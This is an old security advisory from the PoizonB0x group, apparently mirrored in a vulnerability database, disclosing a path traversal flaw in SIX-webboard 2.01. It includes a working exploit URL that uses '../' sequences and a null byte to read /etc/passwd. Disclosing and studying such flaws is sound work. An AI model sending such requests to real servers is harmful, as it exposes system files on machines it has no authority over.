SIX-webboard 2.01 "show files" vulnerability

2001-08-14T00:00:00
ID SECURITYVULNS:DOC:1928
Type securityvulns
Reporter Securityvulns
Modified 2001-08-14T00:00:00

Description

  • a little bit late, but "it's better late than never"! *

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-

-NAME: SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION: Little, but very popular webboard coded by Pipo (webmaster@sixhead.com). Find more information about the SIX-webboard here: http://www.sixhead.com or http://www.sixhead.net.

-PROBLEM: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally.

-EXPLOIT: http://www.target.net/cgi-bin/webboard/generate.cgi ?content=../../../../../../../../../etc/passwd% 00&board=boardsname !The above line if given will output the file contents of /etc/passwd

-AUTHORs: Discovery: digitalseed and k$en0r Advisory: digitalseed

-DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk.

-COPYRIGHT: PoizonB0x Crew - www.poizonb0x.org (c) 2000- 2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-